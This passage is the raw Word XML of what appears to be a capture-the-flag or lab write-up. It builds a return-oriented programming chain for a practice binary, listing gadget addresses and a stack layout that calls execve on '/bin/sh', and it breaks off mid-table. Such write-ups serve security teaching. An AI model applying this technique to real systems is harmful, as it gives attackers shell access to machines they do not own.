        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3145"/>
      </w:tblGrid>
      <w:tr w:rsidR="00022339" w14:paraId="729A8F52" w14:textId="77777777" w:rsidTr="00E2738D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="21FBF228" w14:textId="77777777" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>mov rdi, &lt;Addr /bin/sh&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5985B9FA" w14:textId="77777777" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>mov rsi, 0x00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3C96AA" w14:textId="77777777" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>mov rdx, 0x00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016CF8B7" w14:textId="77777777" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>mov rax, 0x3b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F2326F7" w14:textId="4C8E28D2" w:rsidR="00022339" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>syscall</w:t>
            </w:r>
            <w:r w:rsidR="00022339">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E792278" w14:textId="6161A05D" w:rsidR="00022339" w:rsidRDefault="00E2738D" w:rsidP="00022339">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Gadget Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE4CA8F" w14:textId="2FFE73B4" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435"/>
    <w:p w14:paraId="5BA6B54E" w14:textId="77777777" w:rsidR="00E2738D" w:rsidRDefault="00E2738D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B999B" w14:textId="79520C17" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gadget A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548097FD" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The first gadget will set </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to an address containing the string </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>"/bin/sh"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before performing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that jumps to the next gadget. The string is in the program memory at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00400708</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which the developer labeled </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>useful_string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for hackers' convenience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1CB5A5" w14:textId="787A903C" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DC34FF4" wp14:editId="6A2791D1">
            <wp:extent cx="4429125" cy="1162050"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
            <wp:docPr id="1195351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5116"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1162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Useful String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7817B0BF" w14:textId="17A8BB0E" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">A gadget that will pop data off the stack and into </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is available at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x0040062e</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4505"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2738D" w14:paraId="32115942" w14:textId="77777777" w:rsidTr="00E2738D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="14B9AC3D" w14:textId="2D2B4C5D" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
            <w:pPr>
              <w:pStyle w:val="LineCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00E2738D">
              <w:t>0x000000000040062e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E2738D">
              <w:t>pop rdi ; ret</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="450144BE" w14:textId="382A294B" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Gadget A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C094C" w14:textId="71AE4105" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Gadget B and Gadget C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0D7B7A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The following two gadgets must set both </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. These can be found in lines </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00400636</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x0040063e</w:t>
      </w:r>
      <w:r>
        <w:t>, respectively.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4505"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2738D" w14:paraId="1A30C610" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2AABC1A6" w14:textId="1B9E5A81" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="LineCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00E2738D">
              <w:t>0x0000000000400636</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E2738D">
              <w:t>pop rsi ; ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C2B1599" w14:textId="77095260" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gadget </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4505"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2738D" w14:paraId="20BDE918" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7BE87ADA" w14:textId="220B2C67" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="LineCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00E2738D">
              <w:t>0x000000000040063e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E2738D">
              <w:t>pop rdx ; ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F779C15" w14:textId="7056019E" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gadget </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456D5CEF" w14:textId="715FB38A" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Gadget D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F932008" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The next gadget should move data into </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which can be found at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00400646</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4505"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2738D" w14:paraId="03AE674C" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="47AE4589" w14:textId="26F86829" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="LineCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00E2738D">
              <w:t>0x0000000000400646</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E2738D">
              <w:t>pop rax ; ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A409944" w14:textId="2A7D9B57" w:rsidR="00847435" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gadget </w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B448EAF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Gadget E and Gadget F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5022A644" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">After all of the operations above, it is finally time to call the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00400625</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2738D" w14:paraId="468540C3" w14:textId="77777777" w:rsidTr="00E2738D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3775" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="24AE1C6D" w14:textId="7336AF94" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="LineCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00E2738D">
              <w:t>0x0000000000400625</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E2738D">
              <w:t>syscall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="282EC0FB" w14:textId="4952913D" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gadget </w:t>
      </w:r>
      <w:r>
        <w:t>E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A773B1" w14:textId="5E52C3CF" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Gadget E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not include a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operation, so the final gadget is a standalone </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x004004a9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3325"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2738D" w14:paraId="3895CA31" w14:textId="77777777" w:rsidTr="00E2738D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="457BC733" w14:textId="5987C6E2" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="LineCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00E2738D">
              <w:t>0x00000000004004a9</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E2738D">
              <w:t>ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B0E3228" w14:textId="0A4BC781" w:rsidR="00847435" w:rsidRDefault="00E2738D" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gadget </w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B5A78" w14:textId="77777777" w:rsidR="00E2738D" w:rsidRDefault="00E2738D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA6EEBD" w14:textId="4D95318F" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00E2738D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Stack </w:t>
      </w:r>
      <w:r w:rsidR="00E2738D">
        <w:t>Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3121AA11" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2738D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00400678</w:t>
      </w:r>
      <w:r>
        <w:t>, the stack should have the following data:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6925"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2738D" w14:paraId="07A8E14D" w14:textId="77777777" w:rsidTr="00EC1941">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="64FD0D41" w14:textId="3B413FAC" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">retAddr(main) --&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0x40062e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    // Addr(A) --&gt; pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF27637" w14:textId="5060BA17" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EC1941">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>rsp(A) --&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 0x400708</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    // Addr('/bin/sh')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22AE02A2" w14:textId="28E79AAE" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   retAddr(A) --&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0x400636 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">   // Addr(B) --&gt; pop rsi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A7D4DA" w14:textId="3CA36D28" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">rsp(B) --&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0x00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="299D5410" w14:textId="1B6AAF5D" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00EC1941">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">retAddr(B) --&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0x40063e </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">   // Addr(C) --&gt; pop rdx ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AEAB61" w14:textId="427F3EED" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">rsp(C) --&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0x00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EF1593E" w14:textId="12A5BB35" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   retAddr(C) --&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0x400646 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">   // Addr(D) --&gt; pop rax ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF9716B" w14:textId="06E17697" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">rsp(D) --&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0x3b</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">        // execve</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B81042B" w14:textId="1C6DA2D4" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   retAddr(D) --&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC1941">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 0x400625</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    // Addr(E) --&gt; syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="032042A2" w14:textId="346F4153" w:rsidR="00E2738D" w:rsidRDefault="00E2738D" w:rsidP="00EC1941">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="both"/>
